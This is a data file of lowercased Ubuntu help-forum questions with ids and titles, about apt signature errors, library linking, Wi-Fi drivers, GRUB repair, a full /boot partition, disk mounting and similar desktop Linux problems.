298442	why am i getting badsig error 13.04 / untrusted packages error in software manager	i am trying to update using sudo apt-get update . receiving badsig error . get:1 http : //us.archive.ubuntu.com raring release.gpg [ 933 b ] hit http : //extras.ubuntu.com raring release.gpg hit http : //security.ubuntu.com raring-security release.gpg get:2 http : //us.archive.ubuntu.com raring-updates release.gpg [ 933 b ] hit http : //extras.ubuntu.com raring release hit http : //security.ubuntu.com raring-security release hit http : //us.archive.ubuntu.com raring-backports release.gpg hit http : //extras.ubuntu.com raring/main sources hit http : //us.archive.ubuntu.com raring release hit http : //security.ubuntu.com raring-security/main sources ign http : //us.archive.ubuntu.com raring release hit http : //extras.ubuntu.com raring/main amd64 packages get:3 http : //us.archive.ubuntu.com raring-updates release [ 40.8 kb ] hit http : //security.ubuntu.com raring-security/restricted sources hit http : //extras.ubuntu.com raring/main i386 packages hit http : //security.ubuntu.com raring-security/universe sources hit http : //security.ubuntu.com raring-security/multiverse sources hit http : //security.ubuntu.com raring-security/main amd64 packages hit http : //us.archive.ubuntu.com raring-backports release ign http : //us.archive.ubuntu.com raring/main sources/diffindex hit http : //security.ubuntu.com raring-security/restricted amd64 packages ign http : //us.archive.ubuntu.com raring/restricted sources/diffindex hit http : //security.ubuntu.com raring-security/universe amd64 packages ign http : //us.archive.ubuntu.com raring/universe sources/diffindex hit http : //security.ubuntu.com raring-security/multiverse amd64 packages ign http : //us.archive.ubuntu.com raring/multiverse sources/diffindex hit http : //security.ubuntu.com raring-security/main i386 packages ign http : //us.archive.ubuntu.com raring/main amd64 packages/diffindex hit http : //security.ubuntu.com raring-security/restricted i386 packages ign http : //us.archive.ubuntu.com raring/restricted amd64 packages/diffindex ign http : //us.archive.ubuntu.com raring/universe amd64 packages/diffindex ign http : //extras.ubuntu.com raring/main translation-en_us hit http : //security.ubuntu.com raring-security/universe i386 packages ign http : //us.archive.ubuntu.com raring/multiverse amd64 packages/diffindex ign http : //extras.ubuntu.com raring/main translation-en hit http : //security.ubuntu.com raring-security/multiverse i386 packages ign http : //us.archive.ubuntu.com raring/main i386 packages/diffindex ign http : //us.archive.ubuntu.com raring/restricted i386 packages/diffindex hit http : //security.ubuntu.com raring-security/main translation-en ign http : //us.archive.ubuntu.com raring/universe i386 packages/diffindex ign http : //us.archive.ubuntu.com raring/multiverse i386 packages/diffindex hit http : //security.ubuntu.com raring-security/multiverse translation-en hit http : //us.archive.ubuntu.com raring/main translation-en hit http : //security.ubuntu.com raring-security/restricted translation-en hit http : //us.archive.ubuntu.com raring/multiverse translation-en hit http : //security.ubuntu.com raring-security/universe translation-en hit http : //us.archive.ubuntu.com raring/restricted translation-en hit http : //us.archive.ubuntu.com raring/universe translation-en get:4 http : //us.archive.ubuntu.com raring-updates/main sources [ 14.0 kb ] get:5 http : //us.archive.ubuntu.com raring-updates/restricted sources [ 14 b ] get:6 http : //us.archive.ubuntu.com raring-updates/universe sources [ 9,167 b ] get:7 http : //us.archive.ubuntu.com raring-updates/multiverse sources [ 697 b ] get:8 http : //us.archive.ubuntu.com raring-updates/main amd64 packages [ 42.5 kb ] ign http : //security.ubuntu.com raring-security/main translation-en_us get:9 http : //us.archive.ubuntu.com raring-updates/restricted amd64 packages [ 14 b ] get:10 http : //us.archive.ubuntu.com raring-updates/universe amd64 packages [ 29.6 kb ] ign http : //security.ubuntu.com raring-security/multiverse translation-en_us ign http : //security.ubuntu.com raring-security/restricted translation-en_us ign http : //security.ubuntu.com raring-security/universe translation-en_us get:11 http : //us.archive.ubuntu.com raring-updates/multiverse amd64 packages [ 1,164 b ] get:12 http : //us.archive.ubuntu.com raring-updates/main i386 packages [ 42.0 kb ] get:13 http : //us.archive.ubuntu.com raring-updates/restricted i386 packages [ 14 b ] get:14 http : //us.archive.ubuntu.com raring-updates/universe i386 packages [ 29.9 kb ] get:15 http : //us.archive.ubuntu.com raring-updates/multiverse i386 packages [ 1,389 b ] hit http : //us.archive.ubuntu.com raring-updates/main translation-en hit http : //us.archive.ubuntu.com raring-updates/multiverse translation-en hit http : //us.archive.ubuntu.com raring-updates/restricted translation-en hit http : //us.archive.ubuntu.com raring-updates/universe translation-en hit http : //us.archive.ubuntu.com raring-backports/main sources hit http : //us.archive.ubuntu.com raring-backports/restricted sources hit http : //us.archive.ubuntu.com raring-backports/universe sources hit http : //us.archive.ubuntu.com raring-backports/multiverse sources hit http : //us.archive.ubuntu.com raring-backports/main amd64 packages hit http : //us.archive.ubuntu.com raring-backports/restricted amd64 packages hit http : //us.archive.ubuntu.com raring-backports/universe amd64 packages hit http : //us.archive.ubuntu.com raring-backports/multiverse amd64 packages hit http : //us.archive.ubuntu.com raring-backports/main i386 packages hit http : //us.archive.ubuntu.com raring-backports/restricted i386 packages hit http : //us.archive.ubuntu.com raring-backports/universe i386 packages hit http : //us.archive.ubuntu.com raring-backports/multiverse i386 packages hit http : //us.archive.ubuntu.com raring-backports/main translation-en hit http : //us.archive.ubuntu.com raring-backports/multiverse translation-en hit http : //us.archive.ubuntu.com raring-backports/restricted translation-en hit http : //us.archive.ubuntu.com raring-backports/universe translation-en hit http : //us.archive.ubuntu.com raring/main sources hit http : //us.archive.ubuntu.com raring/restricted sources hit http : //us.archive.ubuntu.com raring/universe sources hit http : //us.archive.ubuntu.com raring/multiverse sources hit http : //us.archive.ubuntu.com raring/main amd64 packages hit http : //us.archive.ubuntu.com raring/restricted amd64 packages hit http : //us.archive.ubuntu.com raring/universe amd64 packages hit http : //us.archive.ubuntu.com raring/multiverse amd64 packages hit http : //us.archive.ubuntu.com raring/main i386 packages hit http : //us.archive.ubuntu.com raring/restricted i386 packages hit http : //us.archive.ubuntu.com raring/universe i386 packages hit http : //us.archive.ubuntu.com raring/multiverse i386 packages ign http : //us.archive.ubuntu.com raring/main translation-en_us ign http : //us.archive.ubuntu.com raring/multiverse translation-en_us ign http : //us.archive.ubuntu.com raring/restricted translation-en_us ign http : //us.archive.ubuntu.com raring/universe translation-en_us ign http : //us.archive.ubuntu.com raring-updates/main translation-en_us ign http : //us.archive.ubuntu.com raring-updates/multiverse translation-en_us ign http : //us.archive.ubuntu.com raring-updates/restricted translation-en_us ign http : //us.archive.ubuntu.com raring-updates/universe translation-en_us ign http : //us.archive.ubuntu.com raring-backports/main translation-en_us ign http : //us.archive.ubuntu.com raring-backports/multiverse translation-en_us ign http : //us.archive.ubuntu.com raring-backports/restricted translation-en_us ign http : //us.archive.ubuntu.com raring-backports/universe translation-en_us fetched 213 kb in 17s ( 12.4 kb/s ) reading package lists ... done w : gpg error : http : //us.archive.ubuntu.com raring release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > how do i fix this ? also getting installation errors about installing untrusted packages in ubuntu software center . `` requires installation of untrusted packages '' libgconf2-4 libxss1 this occurs when installing any application . different errors per app . never had this problem in ubuntu until now . i 'm about ready to leave and go back to deb , but i like the look and feel of ubuntu .
298448	how to manage libstdc++.so.6 : wrong elf class : elfclass64 at computer cluster	i have a problem with the libstdc++.so.6 library when i execute a program in matlab . the code works fine on my laptop and my desktop , which is why i 'm sure the problem is a library or linking compatibility issue : /home/arturo/virality/viral_cluster_ml/viral_features/code/segment_pedro/segment : error while loading shared libraries : libstdc++.so.6 : wrong elf class : elfclass64 i 've google some answers on how to fix the library , and some say that i should remove the library to later re-install the correct version : http : //stackoverflow.com/questions/3967661/error-while-loading-shared-libraries-libstdc-so-6-wrong-elf-class-elfclass6 the problem is that i ca n't afford the luxury to delete a library , because i am ssh'ing to a cluster at the lab i 'm working in . i really would n't want to mess up any programs that are running at the cluster , so is n't there another way of fixing this problem ? i 'm hoping a solution similar to : sudo apt-get install libstd++6 that does n't require me to delete or modify any files , but rather to install them . or maybe the error is that i 'm not linking the library correctly ? the file does exist , as when i use locate libstd++.so.6 the computer finds it at these directories : /usr/lib64/libstdc++.so.6 /usr/lib64/libstdc++.so.6.0.13 /usr/local/matlab/r2012b/sys/os/glnxa64/libstdc++.so.6 /usr/local/matlab/r2012b/sys/os/glnxa64/libstdc++.so.6.0.13 /usr/local/matlab/r2012b/toolbox/sldv/sldv/polyspace-dvo/lib/x86-linux/libstdc++.so.6 /usr/local/matlab/r2012b/toolbox/sldv/sldv/polyspace-dvo/lib/x86-linux/libstdc++.so.6.0.13 /usr/local/matlab/r2013a/sys/os/glnxa64/libstdc++.so.6 /usr/local/matlab/r2013a/sys/os/glnxa64/libstdc++.so.6.0.13 /usr/local/matlab/r2013a_dcs/sys/os/glnxa64/libstdc++.so.6 /usr/local/matlab/r2013a_dcs/sys/os/glnxa64/libstdc++.so.6.0.13 /usr/local/matlab_r2012a/bin/glnxa64/libstdc++.so.6 /usr/local/matlab_r2012a/bin/glnxa64/libstdc++.so.6.0.13 /usr/local/matlab_r2012a/sys/os/glnxa64/libstdc++.so.6 /usr/local/matlab_r2012a/sys/os/glnxa64/libstdc++.so.6.0.13 /usr/local/matlab_r2012a/toolbox/sldv/sldv/polyspace-dvo/lib/x86-linux/libstdc++.so.6 /usr/share/gdb/auto-load/usr/lib/libstdc++.so.6.0.13-gdb.py /usr/share/gdb/auto-load/usr/lib/libstdc++.so.6.0.13-gdb.pyc /usr/share/gdb/auto-load/usr/lib/libstdc++.so.6.0.13-gdb.pyo /usr/share/gdb/auto-load/usr/lib64/libstdc++.so.6.0.13-gdb.py /usr/share/gdb/auto-load/usr/lib64/libstdc++.so.6.0.13-gdb.pyc /usr/share/gdb/auto-load/usr/lib64/libstdc++.so.6.0.13-gdb.pyo i 've also tried setting the path to the the file before running matlab , without anyluck : ld_library_path=/usr/lib64 : /home/arturo/virality/viral_cluster_ml/viral_features/code/scene_sun ./matlab similar link and problem : http : //www.linuxquestions.org/questions/linux-newbie-8/apt-get-messed-up-812346/ *the cluster 's distribution is scientific linux .
298452	prevent window from closing	often i 'll open a program from terminal ( gedit , or some software i 'm working on , etc . ) then press alt+f4 to close the program ... then press it again closing the terminal even though i 'm not done with it . is there a way i can 'pin ' a window so as to prevent it from closing , but easily be able to unpin it to close the window ?
298454	wi-fi not working on asus u56e on ubuntu 13.04	i do n't think this is a huge problem because it seemed to be an easy fix for ubuntu 11 and 12 so now i 'm using 13.03 and can not find a solution to my wi-fi problem . my lap-top can find all the wireless networks in the area but it can not connect to them at all . in ubuntu 12 i used this script to connect to the wireless networks and it worked perfectly fine . i set it up so that whenever i started up ubuntu this script would run allowing the wi-fi card to connect to the desired network : echo `` type root password to enable wireless . '' sudo modprobe -r iwlagn sudo modprobe iwlagn bt_coex_active=0 echo off now whenever i try to run that script this is what i get ( i removed the echo off part of the script to get the output ) : $ bash wifion.sh type root password to enable wireless . [ sudo ] password for max : fatal : module iwlagn not found . fatal : module iwlagn not found . if you need any extra information please let me know and i will try to post that as well . thanks max kulik
298456	why does ubuntu think that my imac is a laptop ?	i recently installed ubuntu 13.04 on my late-2010 imac . i am dual-booting os x 10.8.3 and ubuntu . for some reason , ubuntu thinks that my system is a laptop . under the `` displays '' settings , it only says laptop . i ran the 'sudo laptop-detect -v ' command in a terminal , and it says `` we 're a laptop ( acpi batteries found ) '' does anyone know why this is ? it does n't affect my system or anything , it 's just kind of annoying and i would like to change it . is this possible , or is this just a bug in the code ?
298458	ubuntu compatibility	i 'm in the process of building a computer for a customer who has requested ubuntu 13.04 to be installed could someone tell me if the following components are compatible . cpu : pentium g2020 motherboard : gigabyte ga-h61ma-d3v ram : 4gb 1333mhz ddr3
298465	need help installing ubuntu 12.04.2 desktop amd-64 dual boot with windows 7	i 'm running windows 7 ( i 'm not sure what service pack ) , and i want to do a dual boot with ubuntu . i 've done some research and homework , but i do n't know how to allocate the space on the hard drive when i shrink the volume of the hard drive . i 've defragged the hard drive , but now what ? do i manually shrink the volume , and if so how much ? or does the install disk i 've created do it for me ? i have a 750gb hard drive . the volume of c : is 685gb , used space is 414gb , free space is 271gb . drive d : ( recovery ) total is 12.8 with 11.2 used and 1.57 free space . i do n't want to touch the recovery drive , because i use that when i reset my machine to factory install . i do n't know what other information to give out , but how much space in kb should i give to windows 7 for the swap file ?
298466	can not syncronise pgp keys with server	since i upgraded to ubuntu 12.04 i am unable to synchronize my pgp keys with the keyservers . i have tried keyserver.ubuntu.com and pool.sks-keyservers.net the error message i get is : could n't retrieve keys from server : keyserver.ubuntu.com could n't communicate with server 'keyserver.ubuntu.com ' : internal server error any suggestion or help ? thanks !
298467	give compaq presario cq62 more control of fan	i 've been having overheating issues with ubuntu 13.04 ( and probably before as well , but i was n't doing anything as intensive as i am now ) and i 'm noticing that the fan never kicks into `` jet engine '' mode like it used to with windows 7 . honestly i do n't mind the noise , i just want to be able to push through the tasks i 'm working on without seriously degrading my performance . i 've already looked into setting my power consumption lower and things like that . does ubuntu not have full control over the fan ? knowledge/instruction is welcome in addition to advice .
298469	my computer system information	heres my system information . is this ok for the latest ubuntu ? is my processor good enough ? about installing ubuntu , i have 2 partitions and i put my important files in 2nd drive ( drive d : ) , after installing ubuntu , does all files will be erased ? operating system : windows xp professional ( 5.1 , build 2600 ) service pack 3 language : english ( regional setting : english ) system manufacturer : lenovo system model : 3000 c100 bios : lenovo bios rev : 1.0 processor : intel ( r ) atom ( tm ) cpu 230 @ 1.60ghz ( 2 cpus ) memory : 1016mb ram page file : 638mb used , 3327mb available directx version : directx 9.0c ( 4.09.0000.0904 )
298472	what is sed and what is it used for ?	i 've been seeing a lot of sed lately , and i find it to be a rather confusing command . the manpages were n't particularly helpful , but i do know that it can be used for parsing the output of other commands . what exactly is sed and what are it 's uses ? i 'm looking for a comprehensive answer covering what sed is , what commonly it is used for , and some basic examples/syntax .
298475	remove any third party packages from former libreoffice installation	after recent updates the global menu dissapeared as mentioned in this question ( libre office shows blank menu and then crashes ) . i tried to file a bug report by typing out ubuntu-bug libreoffice a notification window says '' this problem can not be reported . this is not an official ubuntu package . please remove any third party packages and try again . '' it occured to me that i may had a manually installed version of libreoffice . so i typed the following in terminal sudo apt-get remove -- purge libreoffice* sudo apt-get clean sudo apt-get autoremove and installed libreoffice by typing the following in terminal sudo apt-get install libreoffice after that , i still ca n't file a bug via ubuntu-bug libreoffice . i get the same message . what can i do now to get a menu in libreoffice ( back ) . how do i remove third party packages , if i do not know them ?
298476	easiest way to get surface pro built-in wifi working ?	is there a .deb that i can download from another computer and transfer over usb to get surface pro wifi working ? i 'd rather not tinker with modprobe , and i do n't have a usb internet adapter .
298478	menus of libreoffice can not be handled with kde appmenu in kubuntu 13.04	after installing kubuntu 13.04 , libreoffice 4.0.2.2 worked , but the menus looked without borders and flat , and if i tried to use appmenu ( or appmenu button ) the applications were not affected ( the ugly menus stayed at the windows ) . i removed libreoffice-kde and installed libreoffice-gtk , which took care of the menus and now they look quite similar as any other kde app , and , as far as i know , lo-menubar is now part of this package . however , if i try to use another style for the menu ( either `` title bar button '' or `` top screen menubar '' ) writer , for instance , ends up without any menu at all . i checked and i have installed appmenu-gtk , appmenu-gtk3 , appmenu-qt . should i need to install anything else , or modify any configuration file ?
298481	picopix projector	well , the thing is that the picopix projector does n't have a driver for linux and there 's this website http : //git.ao2.it/libam7xxx.git/ claiming to have `` invented '' something for that but in my opinion the writers are the only ones able to understand what 's going down there ! ! could anyone describe it somehow straightforward what 's really to be done ?
298483	attempted to install ubuntu , now i have no boot menu	i attempted to install ubuntu 13.04 onto my secondary hard drive . i say `` attempted '' because i had to cancel the installation after it hung on `` update-grub '' ( or something like that ) for two or three hours . i did n't figure it was ever going to get anything accomplished , so i killed power and turned back on . now i get a message at boot that reads , error : file '/grub/i386-pc/normal.mod ' not found and gives me a command prompt that i have no idea what to do with . i have a primary hard drive running windows 7 , and i was attempting to install ubuntu on a secondary drive within my computer . the installation should have installed or attempted to install grub to my windows partition , since it 's the drive that my computer boots from . in troubleshooting the problem i have attempted the following to no avail : ubuntu @ ubuntu : ~ $ sudo mount /dev/sda1 /mnt ubuntu @ ubuntu : ~ $ grub-install /dev/sda -- root-directory=/mnt resulting in the message path `/mnt/boot/grub ' is not readable by grub on boot . installation is impossible . aborting . that was probably because /sda1 is the windows 7 partition . i do n't really understand how or where grub was actually installed , or how/where i need to try to update it . so then i tried the linux partition , /sdb1 ubuntu @ ubuntu : ~ $ sudo mount /dev/sdb1/ /mnt ubuntu @ ubuntu : ~ $ grub-install /dev/sda -- root-directory=/mnt which returned rm : can not remove â/mnt/boot/grub/i386-pc/915resolution.modâ : permission denied so now i 'm at a loss . i 'm submitting this from the ubuntu livecd as i have no way of logging into either windows 7 or the linux partition that may or may not have actually been created - i have no idea at this point , because i have n't been able to try and boot into it . any help would be greatly appreciated . thanks in advance .
298484	acoustic guitar how can be connected to ubuntu and make it sound like electrical guitar to make metal sounds ?	i have a acoustic guitar , which has audio output jack is there any way i can connect that jack to ubuntu microphone in and then use some existing software which will make the guitar sound like metal sounds ? something like using my ubuntu to replace the need of electrical guitars ? which tools and how it can be done any guides please ? follow up : 1 ) download and install `` rakarrack '' - this helps to make guitar to any effects ( metal , or anything almost ) 2 ) effects sample http : //www.youtube.com/watch ? v=muq49jrbr60 http : //www.youtube.com/watch ? v=4jb7beshwlc
298487	not enough free disk space	i 'm new to ubuntu and i 'm getting an error in software updater . when i try and do my daily updates , it says : the upgrade needs a total of 25.3 m free space on disk /boot . please free at least an additional 25.3 m of disk space on /boot . empty your trash and remove temporary packages of former installations using sudo apt-get clean . i tried typing in sudo apt-get clean into the terminal but i still get the message . all of the pages i read seem to be for experianced ubuntuers . any help would be appreciated . i 'm running ubuntu 12.10 . i want to upgrade to 13.04 but understand i have to finish these first . edit : @ alaa , this is the output from typing in cat /etc/fstab into the terminal : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/ubuntu-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=fa55c082-112d-4b10-bcf3-e7ffec6cebbc /boot ext2 defaults 0 2 /dev/mapper/ubuntu-swap_1 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 matty @ matty-g41m-es2l : ~ $ df -h : filesystem size used avail use % mounted on /dev/mapper/ubuntu-root 915g 27g 842g 4 % / udev 984m 4.0k 984m 1 % /dev tmpfs 397m 1.1m 396m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 992m 1.8m 990m 1 % /run/shm none 100m 52k 100m 1 % /run/user /dev/sda1 228m 222m 0 100 % /boot matty @ matty-g41m-es2l : ~ $ dpkg -l | grep linux-image : ii linux-image-3.5.0-17-generic 3.5.0-17.28 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-18-generic 3.5.0-18.29 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-19-generic 3.5.0-19.30 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-21-generic 3.5.0-21.32 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-22-generic 3.5.0-22.34 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-23-generic 3.5.0-23.35 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-24-generic 3.5.0-24.37 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-25-generic 3.5.0-25.39 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-26-generic 3.5.0-26.42 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp if linux-image-3.5.0-28-generic 3.5.0-28.48 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp
298491	screenshot of current window	when i select to `` grab the current window '' using the screenshot app which comes with ubuntu , the image is b0rked . the same window captured with `` select area to grab '' looks normal : i am using gnome 3 + ubuntu 13.04 , on an asus zenbook .
298492	why do the youtube controls keep popping up when full-screen ?	when playing in full screen in firefox or chromium at random intervals youtube will open up the volume / fast forward panel and then eventually close it . i have also turned off my mouse to rule out mouse movements and my keyboard is not a remote keyboard its a usb keyboard connected to the macmini
298496	ubunu 10.10 unable to upgrade to any latest version	since ubuntu 10.10 is now sent to stone age , i tried upgrading it to 11.04 but sudo do-release-upgrade gives hash sum mismatch , e : some index files failed to download , they have been ignored , or old ones used instead . restoring original system state aborting reading package lists ... done building dependency tree reading state information ... done building data structures ... done === command detached from window ( wed may 22 10:37:21 2013 ) === press x to destroy or r to resurrect window d may 22 10:37:21 2013 ) ===
298499	problem with compiling fft using gcc	i have downloaded the source codes of splash2 from here and i tried to compile fft.c using gcc command on my own machine but i got this error : fft.c:62:28 : fatal error : parmacs_config.h : no such file or directory i searched over the internet but could n't find any useful solutions . any idea ?
298502	virtualbox can not find vm of other userâs vm in ubuntu	i created sersral virtual machines in virtualbox using root user , but when i changed to another user , the virtualbox can not find the previous vm , how could i solve this problem ? i tried to change the authority of related files to be 777 , but it did n't work !
298506	using apt-cache search	i am learning how to use apt . when i do an apt-cache search git to see all packages matching git , i see a bunch of packages whose descriptions have nothing to do with git . why is this so and how can i fix it ? ( ubuntu 12.04.2 lts ) . also , why is the search functionality found in a command that has `` cache '' in its name ? what does search functionality have to do with caches ? thanks .
298509	installing chrome browser on ubuntu 13.4	an error such as libudev0 > =147 prevents chrome to be installed on ubuntu 13.4 ... what happens ? chromium browser is correctly installed on the same system .
298517	problem with quickly text input field	the problem i am using quickly to try the mybrowser demo from the ubuntu website . everything goes well until i add a simple text field ( for url entry ) in glade , then , no warnings are issued but the text-box will not allow text entry from the keyboard . text can be pasted into the field , but all keystrokes are ignored including the enter key . the questions does anyone know how to fix this , or suggest what i am doing that is causing this problem ?
298518	kubuntu freezes during update when trying to download adobe installer	i 'm updating to the latest version of kubuntu , three times running now it 's made it to the part where it goes to down load the adobe plugin installer and it freezes . i waited for 3hrs and saw no network traffic . i 've run 'sudo dpkg -- configure -a ' twice and it sticks at the same place . is there something i 'm missing ? is there perhaps a way to exclude the adobe bits from the update ? thanks
298527	no primary partitions left : how to install ubuntu now that wubi is no longer supported ?	on my pc with windows7 preinstalled , there is no primary partition left to install ubuntu in . /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 1849017239 924405196 7 hpfs/ntfs/exfat /dev/sda3 1849024512 1951424511 51200000 7 hpfs/ntfs/exfat /dev/sda4 1951424512 1953523119 1049304 12 compaq diagnostiek ( 1=system , 2=boot , 3=recover , 4=winpe ( diag ) until now , i have used wubi ( 30 gb ) , even after upgrading to raring . i never encountered any problems , but since ubuntu advises not to use wubi , i wonder how i can install ubuntu if there is no primary partition left . i do not want to delete any of the primary partitions because i am afraid i will not be able to boot windows7 anymore .
298532	why wo n't environment variables added to .profile show up in screen	i 'm running ubuntu 12.04 i added export ld_library_path=/home/dspies/workspace/hdf5-1.8.11-linux-shared/lib to .profile but when i log in and open terminal and put echo $ ld_library_path there 's nothing . when i switch to ctrl-alt-f1 and log in , echo $ ld_library_path gives /home/dspies/workspace/hdf5-1.8.11-linux-shared/lib but then when i run screen , echo $ ld_library_path from within screen is empty again in what circumstances can i expect environment variables from .profile to be set ? ( interestingly , it seems any modifications to path made in .profile always show up ) edit : sorry , i guess i did n't clarify what i really wanted to know which is : how can i set an environment variable that i mean to be set anywhere ( ie in screen , in terminal , when i log-in , and when i ssh in ) ?
298533	dconf and locks	https : //live.gnome.org/dconf/systemadministrators gives a bunch of information which just does n't seem to apply to ubuntu . placing a file in : /etc/dconf/db/local.d/locks and running : sudo dconf update creates a binary file : /etc/dconf/db/local and a rough look inside this file appears to take the contents of /etc/dconf/db/local.d/locks into account but for all intents and purposes , this file appears to be ignored . does anyone know how to apply dconf locks in ubuntu ( tried and tested preferably ) ?
298538	copy paste not working on ubuntu putty	i have been using putty to connect to one of my client server , here the problem is that copy and paste does n't work . when i was on windows it used to work and now i want the same thing on ubuntu 13.10 .
298539	copy files from a directory to a sub-directory ( excluding the sub-directory itself )	i have created a folder ( directory ) named 'parent ' which contains several files ( namely 'file1 ' , 'file2 ' ... 'file100 ' ) and a sub-directory named 'child1'which itself may contain files and folders . now , i want to copy all the contents of 'parent ' excluding the 'child1 ' into the folder 'child1 ' . the final content of 'child1 ' should be something like this : old content of child1 + 'file1 ' ... 'file100'+ 'folder2 ' + 'folder3 ' + etc . how can i achieve this ? please help .
298540	how do i set up a localhost website ?	i have created a simple index.php file which i have places in /var/www/ next i changed the permissions of the file with sudo chmod +x index.php i then ran chromium and typed in localhost to the address bar . chromium then reports that it 's connection attempt to localhost was rejected . the website may be down or your network may not be properly configured . i have a strong feeling that i have not configured something ( or anything ) as it should be configured . i have searched through a number of posts before adding this question and could not find the answer . can someone point me in the right direction please do i need to install lamp ? update 1 the following lines appear in my /etc/hosts file : 127.0.0.1 localhost 127.0.1.1 simon
298544	where to get wireless drivers for ubuntu ?	i am working with a dell inspiron 1545 . i recently installed ubuntu 12.10 on my computer and after i was done , i observe that there is no wireless functionality available on my system . i go to the top right where i can see all the network connections but i dont see any wireless network available . do i need to install the drivers for wireless separately ? how to do that ? and where can i get those ? or is the problem something else ? thanks .
298548	disk mount error in ubuntu 13.04	error mounting /dev/sda2 at /media/deepak/007606a176069814 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/deepak/007606a176069814 '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . please tell me a solution for this ...
298554	open bash terminal in a specific directory	how can i config bash - i 'm using gnome terminal - to open the shell into a specific directory ? i know i can insert a cd /directory into .bashrc , but that is n't good enough because if i use open terminal here from a file manager , it will change the directory and prevent this feature to work as it should .
298555	sort order in nautilus : phonebook-style	i want nautilus to sort in a phonebookstyle , e.g . underscores should be first : _anton _bert _caesar anton bert caesar how can i achieve this ?
298556	reinstall ubuntu 13.04 with 13.04 again will loose data , or not ?	i have tried to install skype with 13.04 and fuc ... something with ( typing -f in some point ) lost libsound2 and 20 more stuff , when finished with system upgrading now , i can not log in my computer , the password is accurate but it start logging for a second and returns back to the login mask , similar to invalid password . i want to reinstall the system but i can not get access to my emails in thunderbird , i have started computer with cd boot but i do n't know how to get to my emails in order to restore these , prior to reinstalling system . i 'm linux geek and would appreciate is someone can help , or advise . thanks ,
298565	bsnl evdo zte not connecting	i 've a bsnl zte evdo ac8700 to connect to the internet . i went to new mobile broadband . ubuntu detects my card as zte cdma . i provided the necessary log in information . enabled auto connect and saved the new network . up to ubuntu 10.10 this much was sufficient and i was able to get the internet . but in later versions , it 's just connecting and connecting and showing at last `` network disconected . you are offline now . '' installed ubuntu 13.04 today and same problem . does this happen due to ubuntu 's transition from genome to unity ? pls solve my problem .
298569	my cpu fan makes more noise while running ubuntu 13.04 ?	i have amd athlon x3 processor gigabyte ga-ma74gmt-s2 motherboard 6gb ddr3 ram ati 4350 hd 1gb graphics card .
298571	video tearing on flash fullscreen	i had some trouble with video tearing ( using nvidia geforce 560ti , with 310.44 nvidia driver ) , but could solve it by setting refresh rate from 50 to 120 in compiz settings manager - > composite . however , tearing is still a problem when watching flash videos . for example , the following video shows heavy tearing in fullscreen : http : //www.youtube.com/watch ? v=22ftfocspqi when watching it using totem and vlc i have no tearing at all ( i downloaded the video ) . as suggested in many different other posts about this topic , i enabled vsync in compiz and nvidia-settings . additionally , i enabled `` prefer maximum performance '' in nvidia-settings . both without any effect . i 'm currently using chrome 27.0.1453.93 with flash plugin `` shockwave flash 11.7 r700 '' on a ubuntu 13.04 64bit machine . any suggestions , how to minimize tearing ?
298575	how could i see applications ' upload/download speeds	i 'd like to see the list of those programs ' upload/download speeds that are connected to the internet so i could know which applications use my internet bandwidth because i experience slow download speed even though i only use a tab which is download . gnome system monitor does n't give me that list but it gives me a chart of my total upload and download speeds
298579	openstack quantum subinterfaces	im having an openstack setup on ubuntu using quantum as networking . i 'm uncertain on which network adapter that the floating ips stick to when associated . is there a way to find out of that ? ip addr show does not list any ips . i know i did a linux terminal command once that showed me all the sub-ips or whatever they shall be called ...
298581	updating to ubuntu studio	i would like to install ubuntu studio on my computer which has currently a dual boot ubuntu_13.04/windows_7 . surfing in the internet i saw that it is possible to upgrade ubuntu to ubuntu studio . the question is : doing the update , will i lose the current ubuntu 13.04 os ? for example , when installing gnome-desktop on unity , you have the possibility of choosing between the two of them when booting the system . is it the same in this case ? if i upgrade to ubuntu studio installing ubuntustudio-desktop , the proper packages and the proper low-latency kernel , will i still have the possibility of choosing between gnome , unity and ubuntu studio during the boot ?
298583	change proxy username -ubuntuone on windows	ubuntuone asked for my proxy username during install , i used it for a while then the password had to be changed . now one is still using the old password . tried to reinstall but the password dialog can not be started . is there a way of changing the password , or atleast accessing my docs without the client ?
298584	desktop background changes to default	i just installed ubuntu 13.04 , and it works perfectly . i also can change my desktop background , the problem is when i restart my computer it changes back to the default background . i already tried several times , and it still keeps changing back to default . please help !
298588	can not access ppa	i know there already exits a post on this ( can not access ppa ... please check your internet connection ) which does n't answer my problem . i was trying to download tlp on ubuntu-13.04 and i got the following errors while adding a ppa : royal @ royal-vostro-3550 : ~ $ sudo add-apt-repository ppa : linrunner/tlp can not access ppa ( https : //launchpad.net/api/1.0/~linrunner/+archive/tlp ) to get ppa information , please check your internet connection .
